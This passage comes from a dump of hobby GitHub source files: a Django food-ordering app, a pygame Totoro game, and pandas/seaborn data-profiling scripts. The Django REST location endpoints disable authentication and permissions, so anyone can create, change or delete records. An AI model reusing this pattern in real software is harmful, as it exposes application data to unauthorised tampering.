path('api/locations/',location_list_api,name=\"LocationListAPI\"),\r\n path('api/locations/<int:pk>/',location_detail_api,name=\"LocationDetailAPI\"),\r\n\r\n path('api/products/', product_list_api, name=\"ProductListAPI\"),\r\n path('api/products/<int:pk>/', product_detail_api, name=\"ProductDetailAPI\"),\r\n\r\n path('api/cities/',city_list_api, name=\"CityListAPI\"),\r\n path('api/cities/<int:pk>/', city_detail_api, name=\"CityDetailAPI\"),\r\n\r\n\r\n path('api/order/',order_list_api, name=\"OrderListAPI\"),\r\n path('api/order/<int:pk>/', order_detail_api, name=\"OrderDetailAPI\"),\r\n\r\n path('api/user_signup/',customer_signup_api,name=\"UserSignupAPI\")\r\n\r\n]\r\n\r\n"
},
{
"alpha_fraction": 0.6002452373504639,
"alphanum_fraction": 0.6112813949584961,
"avg_line_length": 60.730770111083984,
"blob_id": "f4a7e84950f807cd9416987c3cfc7c8bc99c80ba",
"content_id": "ae290ff9848da98b73d0233e0ab763933258ac04",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1631,
"license_type": "no_license",
"max_line_length": 112,
"num_lines": 26,
"path": "/foodcartapp/forms/AuthForms.py",
"repo_name": "rawda-yasser/FoodOrder_Django",
"src_encoding": "UTF-8",
"text": "from django.forms import Form,CharField,TextInput,PasswordInput\r\n\r\nclass Login(Form):\r\n username = CharField(max_length=75, required=True,\r\n widget=TextInput(attrs={'class': 'form-control', 'placeholder': 'Enter Username'}))\r\n password = CharField(max_length=75, required=True,\r\n widget=PasswordInput(attrs={'class': 'form-control', 'placeholder': 'Enter Password'}))\r\n\r\n\r\nclass Signup(Form):\r\n first_name = CharField(max_length=75, required=True,\r\n widget=TextInput(attrs={'class': 'form-control', 'placeholder': 'Enter First Name'}))\r\n last_name = CharField(max_length=75, required=True,\r\n widget=TextInput(attrs={'class': 'form-control', 'placeholder': 'Enter Last Name'}))\r\n username = CharField(max_length=75, required=True,\r\n widget=TextInput(attrs={'class': 'form-control', 'placeholder': 'Enter Username'}))\r\n password = CharField(max_length=75, required=True,\r\n widget=PasswordInput(attrs={'class': 'form-control', 'placeholder': 'Enter Password'}))\r\n pincode = CharField(max_length=7, required=True,\r\n widget=TextInput(attrs={'class': 'form-control', 'placeholder': 'Enter Pincode'}))\r\n\r\n phone_number = CharField(max_length=10, required=True,\r\n widget=TextInput(attrs={'class': 'form-control', 'placeholder': 'Enter Phone Number'}))\r\n\r\n address = CharField(max_length=256, required=True,\r\n widget=TextInput(attrs={'class': 'form-control', 'placeholder': 'Enter Address'}))\r\n"
},
{
"alpha_fraction": 0.7392280101776123,
"alphanum_fraction": 0.7392280101776123,
"avg_line_length": 36.379310607910156,
"blob_id": "bac81607fb333b610581fd56aadbe038a2bf8f96",
"content_id": "e9cad1fe2ce79d19f656f69dea4ee418f23ace82",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 2228,
"license_type": "no_license",
"max_line_length": 82,
"num_lines": 58,
"path": "/foodcartapp/views/LocationViews.py",
"repo_name": "rawda-yasser/FoodOrder_Django",
"src_encoding": "UTF-8",
"text": "from django.contrib.auth.mixins import LoginRequiredMixin, PermissionRequiredMixin\r\nfrom django.core.exceptions import PermissionDenied\r\nfrom django.shortcuts import redirect\r\nfrom django.urls import reverse_lazy\r\nfrom django.views.generic import ListView, CreateView,UpdateView,DeleteView\r\n\r\nfrom foodcartapp.forms.LocationForms import AddLocation, UpdateLocation\r\nfrom foodcartapp.models import *\r\nfrom datetime import datetime\r\n\r\n\r\nclass PermissionHelper(PermissionRequiredMixin):\r\n def has_permission(self):\r\n if self.request.user.is_superuser:\r\n return True\r\n else:\r\n raise PermissionDenied\r\n\r\n\r\nclass location_list_view(PermissionHelper,ListView):\r\n login_url = \"/login/\"\r\n permission_denied_message = \"User is not Authorized\"\r\n model =Location\r\n template_name = \"location_list.html\"\r\n context_object_name = \"location_list\"\r\n\r\n\r\n\r\nclass AddLocationView(LoginRequiredMixin,PermissionHelper,CreateView):\r\n login_url = reverse_lazy(\"foodcartapp:login\")\r\n template_name = 'add_location.html'\r\n form_class = AddLocation\r\n #permission_required = \"foodcartapp.add_location\"\r\n permission_denied_message = \"User does not have permission to add Location\"\r\n raise_exception = True\r\n model = Location\r\n success_url = reverse_lazy(\"foodcartapp:LocationsView\")\r\n\r\n\r\nclass UpdateLocationView(LoginRequiredMixin,PermissionHelper,UpdateView):\r\n login_url = reverse_lazy(\"foodcartapp:login\")\r\n model = Location\r\n #permission_required = \"foodcartapp.change_location\"\r\n permission_denied_message = \"User does not have permission to change location\"\r\n raise_exception = True\r\n form_class = UpdateLocation\r\n template_name = \"update_location.html\"\r\n success_url = reverse_lazy(\"foodcartapp:LocationsView\")\r\n\r\n\r\nclass DeleteLocationView(LoginRequiredMixin,PermissionHelper,DeleteView):\r\n login_url = reverse_lazy(\"foodcartapp:login\")\r\n model = Location\r\n template_name = \"location_confirm_delete.html\"\r\n permission_required = \"foodcartapp.delete_location\"\r\n permission_denied_message = \"User does not have permission to delete location\"\r\n raise_exception = True\r\n success_url = reverse_lazy(\"foodcartapp:LocationsView\")\r\n\r\n"
},
{
"alpha_fraction": 0.7695418000221252,
"alphanum_fraction": 0.7803234457969666,
"avg_line_length": 44.5,
"blob_id": "4d5eee6ed086088673d7ee6bb01a4227c593d603",
"content_id": "d9cfa5cca77e4d2e75e6837e63647f2ec4b11155",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 742,
"license_type": "no_license",
"max_line_length": 73,
"num_lines": 16,
"path": "/foodcartapp/serializers/product_serializer.py",
"repo_name": "rawda-yasser/FoodOrder_Django",
"src_encoding": "UTF-8",
"text": "from rest_framework.serializers import ModelSerializer\r\nfrom rest_framework import serializers\r\nfrom foodcartapp.models import Product\r\nfrom foodcartapp.serializers.hotel_serializer import HotelSerializer\r\n\r\n\r\nclass ProductSerializer(serializers.Serializer):\r\n id=serializers.IntegerField()\r\n name = serializers.CharField(max_length=50)\r\n half_price = serializers.DecimalField(max_digits=8, decimal_places=2)\r\n full_price = serializers.DecimalField(max_digits=8, decimal_places=2)\r\n availabilty = serializers.BooleanField(default=True)\r\n image = serializers.URLField()\r\n special_status = serializers.BooleanField(default=False)\r\n category = serializers.CharField(max_length=50)\r\n hotel = HotelSerializer(many=False)"
},
{
"alpha_fraction": 0.6692660450935364,
"alphanum_fraction": 0.6788991093635559,
"avg_line_length": 33.73770523071289,
"blob_id": "d764e0959e3c6cb57d5e24ee2ed14ddf30c28932",
"content_id": "ec8c976e30352aa0d2a7b4460177a24b873231ac",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 2180,
"license_type": "no_license",
"max_line_length": 90,
"num_lines": 61,
"path": "/foodcartapp/RESTviews/LocationsRestView.py",
"repo_name": "rawda-yasser/FoodOrder_Django",
"src_encoding": "UTF-8",
"text": "from rest_framework import status\r\nfrom rest_framework.authentication import SessionAuthentication, BasicAuthentication\r\nfrom rest_framework.decorators import api_view, authentication_classes, permission_classes\r\nfrom rest_framework.permissions import IsAuthenticated\r\nfrom rest_framework.response import Response\r\nfrom foodcartapp.models import Location\r\nfrom foodcartapp.serializers.location_serializer import *\r\n\r\n\r\n@api_view(['GET', 'POST'])\r\n@authentication_classes(())\r\n@permission_classes(())\r\ndef location_list_api(request):\r\n \"\"\"\r\n List all code snippets, or create a new snippet.\r\n \"\"\"\r\n if request.method == 'GET':\r\n locations = Location.objects.all()\r\n serializer = LocationSerializer(locations, many=True)\r\n return Response(serializer.data)\r\n\r\n elif request.method == 'POST':\r\n serializer = LocationSerializer(data=request.query_params)\r\n if serializer.is_valid():\r\n serializer.save()\r\n\r\n return Response(serializer.data, status=status.HTTP_201_CREATED)\r\n return Response(serializer.errors, status=status.HTTP_400_BAD_REQUEST)\r\n else:\r\n return Response(status=status.HTTP_400_BAD_REQUEST)\r\n\r\n\r\n@api_view(['GET', 'PUT', 'DELETE'])\r\n@authentication_classes(())\r\n@permission_classes(())\r\ndef location_detail_api(request, pk):\r\n \"\"\"\r\n Retrieve, update or delete a code snippet.\r\n \"\"\"\r\n try:\r\n location = Location.objects.get(pk=pk)\r\n except Location.DoesNotExist:\r\n return Response(status=status.HTTP_404_NOT_FOUND)\r\n\r\n if request.method == 'GET':\r\n serializer = LocationSerializer(location)\r\n return Response(serializer.data)\r\n\r\n elif request.method == 'PUT':\r\n serializer = LocationSerializer(location, data=request.query_params)\r\n if serializer.is_valid():\r\n serializer.save()\r\n\r\n return Response(serializer.data)\r\n return Response(serializer.errors, status=status.HTTP_400_BAD_REQUEST)\r\n\r\n elif request.method == 'DELETE':\r\n location.delete()\r\n return Response(status=status.HTTP_204_NO_CONTENT)\r\n else:\r\n return Response(status=status.HTTP_400_BAD_REQUEST)\r\n"
},
{
"alpha_fraction": 0.6917941570281982,
"alphanum_fraction": 0.692072331905365,
"avg_line_length": 37.92222213745117,
"blob_id": "2c2dd91b77f4044e439186b2f768a691ef956e4c",
"content_id": "732c4a9430beaf0110c5204f9fefe6c5ccc4dc97",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 3595,
"license_type": "no_license",
"max_line_length": 106,
"num_lines": 90,
"path": "/foodcartapp/views/ProductViews.py",
"repo_name": "rawda-yasser/FoodOrder_Django",
"src_encoding": "UTF-8",
"text": "from django.contrib.auth.mixins import LoginRequiredMixin, PermissionRequiredMixin\r\nfrom django.shortcuts import redirect\r\nfrom django.urls import reverse_lazy\r\nfrom django.views.generic import ListView, CreateView,UpdateView,DeleteView\r\n\r\nfrom foodcartapp.forms.ProductsForms import AddProduct, UpdateProduct\r\nfrom foodcartapp.models import *\r\nimport cloudinary\r\nimport cloudinary.uploader\r\nimport cloudinary.api\r\n\r\n\r\n\r\nclass PermissionHelper(PermissionRequiredMixin):\r\n def has_permission(self):\r\n user = Product.objects.values('hotel__user__id').get(id=self.kwargs['pk'])\r\n user_id = user['hotel__user__id']\r\n if self.request.user.id == user_id:\r\n return True\r\n else:\r\n return False\r\n\r\n\r\nclass product_list_view(ListView):\r\n model =Product\r\n template_name = \"products_list.html\"\r\n context_object_name = \"products_list\"\r\n\r\n def get_context_data(self,**kwargs):\r\n context=super(product_list_view,self).get_context_data(**kwargs)\r\n #print(context)\r\n context['products_list']=Product.objects.filter(hotel__hoteladmin__user__id=self.request.user.id)\r\n context['Name']=User.objects.get(id=self.request.user.id).username\r\n # if(len(context['card_list'])!=0):\r\n # context['hotel']=Product.objects.values('hotel__name').filter(user__id=self.request.user.id)\r\n return context\r\n\r\n\r\n\r\nclass AddProductView(LoginRequiredMixin,PermissionRequiredMixin,CreateView):\r\n login_url = reverse_lazy(\"foodcartapp:login\")\r\n template_name = 'add_product.html'\r\n form_class = AddProduct\r\n permission_required = \"foodcartapp.add_product\"\r\n permission_denied_message = \"User does not have permission to add Product\"\r\n raise_exception = True\r\n model = Product\r\n success_url = reverse_lazy(\"foodcartapp:ProductsView\")\r\n\r\n\r\n def get_context_data(self,**kwargs):\r\n context=super(AddProductView,self).get_context_data(**kwargs)\r\n context['hotel']=Hotel.objects.filter(hoteladmin_id=self.request.user.id)\r\n return context\r\n\r\n def post(self, request, *args, **kwargs):\r\n form = AddProduct(request.POST,request.FILES)\r\n if form.is_valid():\r\n product = form.save(commit=False)\r\n product.image = cloudinary.uploader.upload_image(request.FILES['image']).url\r\n product.save()\r\n return redirect(\"foodcartapp:ProductsView\")\r\n\r\n\r\n\r\nclass UpdateProductView(LoginRequiredMixin,PermissionHelper,UpdateView):\r\n login_url = reverse_lazy(\"foodcartapp:login\")\r\n model = Product\r\n #permission_required = \"foodcartapp.change_product\"\r\n permission_denied_message = \"User does not have permission to change Product\"\r\n raise_exception = True\r\n form_class = UpdateProduct\r\n template_name = \"update_product.html\"\r\n success_url = reverse_lazy(\"foodcartapp:ProductsView\")\r\n\r\n def get_context_data(self, **kwargs):\r\n context = super(UpdateProductView, self).get_context_data(**kwargs)\r\n context['product']=Product.objects.get(id=self.kwargs['pk'])\r\n context['hotel'] = Hotel.objects.filter(hoteladmin_id=self.request.user.id)\r\n return context\r\n\r\n\r\nclass DeleteProductView(LoginRequiredMixin,PermissionHelper,DeleteView):\r\n login_url = reverse_lazy(\"foodcartapp:login\")\r\n model = Product\r\n template_name = \"product_confirm_delete.html\"\r\n permission_required = \"foodcartapp.delete_product\"\r\n permission_denied_message = \"User does not have permission to delete product\"\r\n raise_exception = True\r\n success_url = reverse_lazy(\"foodcartapp:ProductsView\")\r\n\r\n"
}
] | 30 |
monisha-g/CatBus | https://github.com/monisha-g/CatBus | 4eff4e2815b3bad781868c1a63bd2f9007a1b4e2 | 693ec9c9e7316b001e24d328b58c50499d8ea0b6 | bba70222ef93cad97f4235b091d0a61a44368968 | refs/heads/master | 2015-08-09T01:40:43.997081 | 2013-09-30T21:15:53 | 2013-09-30T21:15:53 | null | 0 | 0 | null | null | null | null | null | [
{
"alpha_fraction": 0.5503315329551697,
"alphanum_fraction": 0.5684146881103516,
"avg_line_length": 28.625,
"blob_id": "aa29f66c203dcabd3602a5d73d696a2521b47c34",
"content_id": "47a797135afc2c91edd68055609ae79c7f401084",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1659,
"license_type": "no_license",
"max_line_length": 68,
"num_lines": 56,
"path": "/scripts/main.py",
"repo_name": "monisha-g/CatBus",
"src_encoding": "UTF-8",
"text": "# this file contains the main game loop\n# it should remain as small as possible\n\nimport pygame\nimport os, sys\n\nfrom pygame.locals import *\n\nimport data\nimport display\nimport player\nimport tiles\n\nclass Main:\n\n def __init__(self):\n\n pygame.init()\n data.screen = pygame.display.set_mode((data.screen_width,\n data.screen_height))\n data.display = display.Display()\n data.bg_surface = pygame.Surface(((data.screen_width*2,\n data.screen_height*2)))\n data.player = player.Totoro((250,250))\n data.player_group = pygame.sprite.RenderPlain((data.player))\n data.block_group = pygame.sprite.Group() # obstructing tiles\n\n data.block_group.add(tiles.Block((100,100)))\n data.block_group.add(tiles.Block((500,329)))\n data.block_group.add(tiles.Block((1,400)))\n data.block_group.add(tiles.Block((600,25)))\n\n def gameLoop(self):\n\n while data.game_running:\n\n # this regulates the framerate\n pygame.time.wait(data.ms_per_refresh)\n data.refreshes += 1\n\n # get keystroke and mouse events\n pygame.event.pump()\n for event in pygame.event.get():\n if event.type == pygame.QUIT:\n sys.exit()\n elif event.type == KEYDOWN:\n data.player.commandKeyDown(event.key)\n elif event.type == KEYUP:\n data.player.commandKeyUp(event.key)\n\n data.display.refreshScreen()\n\n\nif __name__ == \"__main__\":\n MainWindow = Main()\n MainWindow.gameLoop()\n"
},
{
"alpha_fraction": 0.6372239589691162,
"alphanum_fraction": 0.6514195799827576,
"avg_line_length": 22.481481552124023,
"blob_id": "be949316b649c4812800d241993012b597d27617",
"content_id": "5ad07465d294c98b9aacb68207f8afa6d1e182c1",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 634,
"license_type": "no_license",
"max_line_length": 65,
"num_lines": 27,
"path": "/scripts/display.py",
"repo_name": "monisha-g/CatBus",
"src_encoding": "UTF-8",
"text": "# this class handles refreshing the screen,\n# redrawing sprites, and calling object\n# update functions\n# (everything in here could go in main.py\n# but it would be messy)\n\nimport pygame\n\nimport data\n\nclass Display:\n\n def __init__(self):\n\n self.inited = True\n\n def refreshScreen(self):\n\n pygame.display.flip()\n data.screen.fill((0,0,0))\n data.bg_surface.fill((42,40,45))\n data.block_group.update()\n data.player_group.update()\n\n data.block_group.draw(data.bg_surface)\n data.player_group.draw(data.bg_surface)\n data.screen.blit(data.bg_surface,(data.bgs_x,data.bgs_y))\n"
},
{
"alpha_fraction": 0.6443914175033569,
"alphanum_fraction": 0.6539379358291626,
"avg_line_length": 28.928571701049805,
"blob_id": "8670c56eeb1e55ed0b076dec00ae98a9a87f0480",
"content_id": "74f58d3d08b3811510d339f0c2b42f32b418e4cb",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 838,
"license_type": "no_license",
"max_line_length": 131,
"num_lines": 28,
"path": "/scripts/helpers.py",
"repo_name": "monisha-g/CatBus",
"src_encoding": "UTF-8",
"text": "import os, sys\nimport pygame\n\nfrom pygame.locals import *\n\nimport data\n\ndef load_image(name, colorkey=None):\n path = os.path.join('../images')\n path = os.path.join(path, name)\n try:\n image = pygame.image.load(path)\n except pygame.error, message:\n print 'Cannot load image:', path\n raise SystemExit, message\n image = image.convert()\n if colorkey is not None:\n if colorkey is -1:\n colorkey = image.get_at((0,0))\n image.set_colorkey(colorkey, RLEACCEL)\n return image\n\n# grabs the sprite from the position in the spritesheet\n# takes sheet,x,y,width,height\n# coords are in units of 1 tile\ndef grab_sprite(surface, x, y, w, h):\n image = surface.subsurface(pygame.Rect(x*(data.tile_size+1), y*(data.tile_size+1), w*(data.tile_size+1), h*(data.tile_size+1)))\n return image\n"
},
{
"alpha_fraction": 0.6737864017486572,
"alphanum_fraction": 0.7145631313323975,
"avg_line_length": 14.606060981750488,
"blob_id": "78312af1e4ab8a6985d6866afe315592f48af3a6",
"content_id": "276b3e39c697238d58013ff597d43fd6f6bec2d8",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 515,
"license_type": "no_license",
"max_line_length": 38,
"num_lines": 33,
"path": "/scripts/data.py",
"repo_name": "monisha-g/CatBus",
"src_encoding": "UTF-8",
"text": "# this file holds global constants\n# and objects that need to be accessed\n# from multiple files\nfrom pygame.locals import *\n\nbg_surface = None\nbgs_x, bgs_y = 0,0\nscreen_padding = 100\n\nscreen = None\nscreen_width = 600\nscreen_height = 480\n\ndisplay = None\n\nms_per_refresh = 20\nrefreshes = 0\n\ngame_running = True\n\n# control keys\nkeys = [K_RIGHT, K_LEFT, K_UP, K_DOWN]\n\n# sprites and groups\nplayer = None\nplayer_group = None\nblock_group = None\n\n# physics constants\ngravity = 1.0\nterminal_velocity = 12.0\n\ntile_size = 18\n"
},
{
"alpha_fraction": 0.5961538553237915,
"alphanum_fraction": 0.5997596383094788,
"avg_line_length": 27.689655303955078,
"blob_id": "fdcb25918e7b966efa84919d98005f6e0d206c55",
"content_id": "05e0f84fdcc0f8fad9daaf93b92b303a8bd6bee2",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 832,
"license_type": "no_license",
"max_line_length": 60,
"num_lines": 29,
"path": "/scripts/tiles.py",
"repo_name": "monisha-g/CatBus",
"src_encoding": "UTF-8",
"text": "# this holds all the static tiles\nimport pygame\n\nfrom helpers import *\n\nclass Tile(pygame.sprite.Sprite):\n\n def __init__(self, centerPoint, imageList, is_wall):\n self.imageList = imageList\n self.frame = 0\n self.image = imageList[self.frame]\n\tpygame.sprite.Sprite.__init__(self)\n self.rect = self.image.get_rect()\n self.rect.center = centerPoint\n\n self.is_wall = is_wall # to see whether the tile\n # can be moved through or not\n\n def update(self):\n self.image = self.imageList[self.frame]\n self.frame += 1\n if self.frame >= len(self.imageList):\n self.frame = 0\n\nclass Block(Tile):\n\n def __init__(self, centerPoint):\n imageList = [load_image(\"block.png\")]\n Tile.__init__(self, centerPoint, imageList, True)\n"
},
{
"alpha_fraction": 0.5586466193199158,
"alphanum_fraction": 0.5631579160690308,
"avg_line_length": 34,
"blob_id": "b4fff3a80e4ce85f8df19d922a6941c6d40da1c9",
"content_id": "33f21873fc76d89ce0a4fb13818a0eaa0cbaf312",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 2660,
"license_type": "no_license",
"max_line_length": 76,
"num_lines": 76,
"path": "/scripts/objects.py",
"repo_name": "monisha-g/CatBus",
"src_encoding": "UTF-8",
"text": "# this file should contain base classes for sprites and tiles\n\nimport pygame\nimport math\n\nimport data\n\nclass Object(pygame.sprite.Sprite):\n\n def __init__(self, centerPoint, imageList, activeAI, player):\n self.player = player # keeps track of the player character\n self.imageList = imageList # the current image list\n self.frame = 0 # for cycling through images\n self.frame_speed = 1\n self.image = self.imageList[self.frame/self.frame_speed]\n\n pygame.sprite.Sprite.__init__(self)\n self.rect = self.image.get_rect()\n self.rect.center = centerPoint\n\n self.dead = False # being removed from play?\n self.falling = False # affected by gravity?\n self.facing = 0\t # which way it is moving\n self.xMove,self.yMove = 0,0 # for movement\n self.anim_image = None # for when the object is just\n # a hitbox\n\n self.ai_counter = 0\t # for switching AI states\n self.currentAI = activeAI # the function to be called\n # every refresh dictating behavior\n\n def update(self):\n\n self.currentAI()\n\n def updateImage(self): # cycle through images\n\n self.image = self.imageList[self.frame/self.frame_speed]\n self.frame += 1\n if self.frame >= len(self.imageList) * self.frame_speed:\n self.frame = 0\n\n def switchAI(self, newAI, imageList, frame_speed):\n\n self.anim_image.frame_speed = frame_speed\n self.anim_image.frame = 0\n self.anim_image.imageList = imageList\n self.currentAI = newAI\n self.AI_counter = 0\n\n def basicMovement(self, x_move, y_move, move_screen):\n\n if self.falling:\n self.fall_speed += data.gravity\n if self.fall_speed > data.terminal_velocity:\n self.fall_speed = data.terminal_velocity\n\n self.rect.x += x_move\n if move_screen:\n x,y = self.rect.center\n x += data.bgs_x\n if x < data.screen_padding and x_move < 0:\n data.bgs_x -= x_move\n elif x > data.screen_width - data.screen_padding and x_move > 0:\n data.bgs_x -= x_move\n # handle collisions here!\n\n self.rect.y += y_move\n if move_screen:\n x,y = self.rect.center\n y += data.bgs_y\n if y < data.screen_padding and y_move:\n data.bgs_y -= y_move\n elif y > data.screen_height - data.screen_padding and y_move:\n data.bgs_y -= y_move\n # handle more collisions\n"
},
{
"alpha_fraction": 0.5925925970077515,
"alphanum_fraction": 0.5925925970077515,
"avg_line_length": 5.75,
"blob_id": "85fb54d7a78818b28754fe923a692551d1414e71",
"content_id": "4cc8792866e55d7c5daef12a2f6031f43155beb6",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 27,
"license_type": "no_license",
"max_line_length": 11,
"num_lines": 4,
"path": "/README.md",
"repo_name": "monisha-g/CatBus",
"src_encoding": "UTF-8",
"text": "CatBus\n======\n\nTotoro game\n"
},
{
"alpha_fraction": 0.549909234046936,
"alphanum_fraction": 0.5580762028694153,
"avg_line_length": 25.878047943115234,
"blob_id": "58e4c04a16012e2dd01b1dd3fed10d3c5d1e60b9",
"content_id": "bd6377e327da935b0df684b76be3f30806145c55",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1102,
"license_type": "no_license",
"max_line_length": 78,
"num_lines": 41,
"path": "/scripts/player.py",
"repo_name": "monisha-g/CatBus",
"src_encoding": "UTF-8",
"text": "# class for the player character\nimport pygame\n\nimport data\nimport objects\n\nfrom helpers import *\n\nclass Totoro(objects.Object):\n\n def __init__(self, centerPoint):\n self.image = load_image(\"hitbox.png\")\n self.imageList = [self.image]\n\n objects.Object.__init__(self, centerPoint, self.imageList, None, self)\n\n self.speed = 5\n\n def update(self):\n\n objects.Object.basicMovement(self, self.xMove, self.yMove, True)\n\n def commandKeyDown(self, key):\n if (key == data.keys[0]):\n self.xMove += self.speed\n elif (key == data.keys[1]):\n self.xMove -= self.speed\n elif (key == data.keys[2]):\n self.yMove -= self.speed\n elif (key == data.keys[3]):\n self.yMove += self.speed\n\n def commandKeyUp(self, key):\n if (key == data.keys[0]):\n self.xMove -= self.speed\n elif (key == data.keys[1]):\n self.xMove += self.speed\n elif (key == data.keys[2]):\n self.yMove += self.speed\n elif (key == data.keys[3]):\n self.yMove -= self.speed\n"
}
] | 8 |
thileebandharmat/data_insight | https://github.com/thileebandharmat/data_insight | 53bfe4b2aaf1c75764c7005f5061088e4aeefe30 | 2f8f2b11f57b91a1eb60f2a57d0664d70613f5b5 | ae66b24570e894a35ff35f0815988f4615f2bb75 | refs/heads/master | 2022-05-28T03:26:59.571783 | 2020-04-29T12:06:33 | 2020-04-29T12:06:33 | 258,300,720 | 0 | 0 | null | null | null | null | null | [
{
"alpha_fraction": 0.5806916356086731,
"alphanum_fraction": 0.6008645296096802,
"avg_line_length": 28.844444274902344,
"blob_id": "4b708bde4a24503fb807f5f227c59fad6f6bfb12",
"content_id": "827046a84442e4e4d30c3406873895bdb31f836b",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1388,
"license_type": "no_license",
"max_line_length": 89,
"num_lines": 45,
"path": "/Data_Insights/practice_2.py",
"repo_name": "thileebandharmat/data_insight",
"src_encoding": "UTF-8",
"text": "import pandas as pd\r\nimport matplotlib.pyplot as plt\r\nimport seaborn as sns\r\nimport os\r\n\r\nstudents = [('jack', 34, 'Sydeny'),\r\n('Riti', 30, 'Delhi'),\r\n('Aadi', 16, 'New York'),\r\n('Riti', 30, 'Delhi'),\r\n('Riti', 30, 'Delhi'),\r\n('Riti', 30, 'Mumbai'),\r\n('Aadi', 40, 'London'),\r\n('Sachin', 30, 'Delhi')\r\n]\r\n# Create a DataFrame object\r\nsource = pd.read_csv('F:\\xxxxx\\python\\\\\\Data_2.csv')\r\nprint(source.head())\r\n\r\nroot_path = 'F:\\xxxxx\\python\\\\'\r\nfolder = 'Visuals'\r\noutput_path = os.path.join(root_path, folder)\r\nos.mkdir(output_path)\r\nfor col in list(source.columns):\r\n if len(source[col].unique()) < 21:\r\n filename = 'Count_plot_'+col+'.png'\r\n file_full_name = os.path.join(output_path, filename)\r\n sns_plot = sns.countplot(x=col, data=source)\r\n fig = sns_plot.get_figure()\r\n fig.savefig(file_full_name)\r\n elif (len(source[col].unique()) > 21) & (source[col].dtypes in ['int64', 'float64']):\r\n filename = 'Dist_plot_' + col + '.png'\r\n file_full_name = os.path.join(output_path, filename)\r\n sns_plot = sns.distplot(source[col], hist=True, bins=50)\r\n #sns_plot = sns.distplot(source[col])\r\n fig = sns_plot.get_figure()\r\n fig.savefig(file_full_name)\r\n\r\n\r\n\r\n'''\r\nsns_plot = sns.pairplot(data=source)\r\nsns_plot.savefig('F:\\xxxxx\\python\\\\pair_plot.png')\r\nplt.show()'''\r\n\r\n#sns.countplot(x='pk_1', data=source)\r\n"
},
{
"alpha_fraction": 0.6366666555404663,
"alphanum_fraction": 0.6394444704055786,
"avg_line_length": 55.36170196533203,
"blob_id": "d2d6640a38c7c4df12ab1b19e90c1467a73a8914",
"content_id": "0673161a22fa95f066b4d81192b7628c1e118bd0",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 5400,
"license_type": "no_license",
"max_line_length": 117,
"num_lines": 94,
"path": "/Data_Insights/Implemented as Objects/Insight_Creation.py",
"repo_name": "thileebandharmat/data_insight",
"src_encoding": "UTF-8",
"text": "import pandas as pd\r\nimport os\r\n\r\nclass InsightCreation:\r\n\r\n def create_summary(source, output_path):\r\n \"\"\"This function gets a dataframe and output path as an input,\r\n Finds number of records, number of duplicate records, column names, data types and sample records.\r\n Writes those findings in a text file\"\"\"\r\n print(\"Started creating summary.,\")\r\n src_cnt = \"Number of records in Source is: \" + str(len(source)) + \"\\n\\n\"\r\n src_dup_cnt = \"Number of duplicate records in source is: \" + str(\r\n len(source[source.duplicated(keep=False)])) + \"\\n\\n\"\r\n column_name = \"Attribute names available in source is: \" + str(list(source.columns)) + \"\\n\\n\"\r\n data_msg = \"Data type of each attribute name is as below \\n\"\r\n data_types = str(source.dtypes) + \"\\n\\n\"\r\n header_msg = \"Sample records from the source is as below \\n\"\r\n sample_records = source.sample(n=10)\r\n report = 'Summary.txt'\r\n summary_report = os.path.join(output_path, report)\r\n with open(summary_report, 'a') as fl:\r\n fl.writelines([src_cnt, src_dup_cnt, column_name, data_msg, data_types, header_msg, str(sample_records)])\r\n sample_file_nm = 'Sample_records.csv'\r\n sample_file_path = os.path.join(output_path, sample_file_nm)\r\n source.sample(n=1000).to_csv(sample_file_path)\r\n print(\"Completed creating summary.,\")\r\n\r\n def find_complete_duplicates(source, output_path):\r\n \"\"\"This function receives a dataframe and output path as an input.\r\n Finds the complete duplicate records in the dataframe.\r\n Writes those duplicate records in a csv file in the output path\"\"\"\r\n print(\"Started finding complete duplicate records.,\")\r\n overall_dup_cnt = len(source[source.duplicated(keep=False)])\r\n report = 'Complete_Duplicate.csv'\r\n duplicate_report = os.path.join(output_path, report)\r\n if overall_dup_cnt > 1:\r\n dup_df = source[source.duplicated(keep=False)]\r\n dup_df.to_csv(duplicate_report)\r\n else:\r\n print(\"No duplicate records Available\")\r\n print(\"Completed finding complete duplicate records.,\")\r\n\r\n def find_pk_duplicates(source, output_path, primary_key):\r\n \"\"\"This function receives a dataframe, output path and primary key of a dataframe as an input.\r\n Finds the duplicate records based on the primary key.\r\n Writes those duplicate records in a csv file in the output path\"\"\"\r\n print(\"Started finding duplicate records based on primary key.,\")\r\n if primary_key[0] == '':\r\n primary_key = list(source.columns)\r\n report = 'Primary_Key_Duplicate.csv'\r\n primary_key_duplicate_report = os.path.join(output_path, report)\r\n pk_dup_df = source[source.duplicated(subset=primary_key, keep=False)]\r\n pk_dup_df.to_csv(primary_key_duplicate_report)\r\n print(\"Completed finding duplicate records based on primary key.,\")\r\n\r\n def find_null_counts(source, output_path):\r\n \"\"\"This function receives the dataframe and output path as an input.\r\n Finds the number of null records and not null records in each columns.\r\n Writes those count information in a csv file in the output path\"\"\"\r\n print(\"Started finding count of null and not null records in each column.,\")\r\n null_records = source.isnull().sum()\r\n not_null_records = source.notnull().sum()\r\n null_and_not_null = pd.concat([not_null_records, null_records], axis=1)\r\n null_and_not_null.columns = ['Not_Null_count', 'Null_count']\r\n report = 'Null_not_null_records_counts.csv'\r\n report_name = os.path.join(output_path, 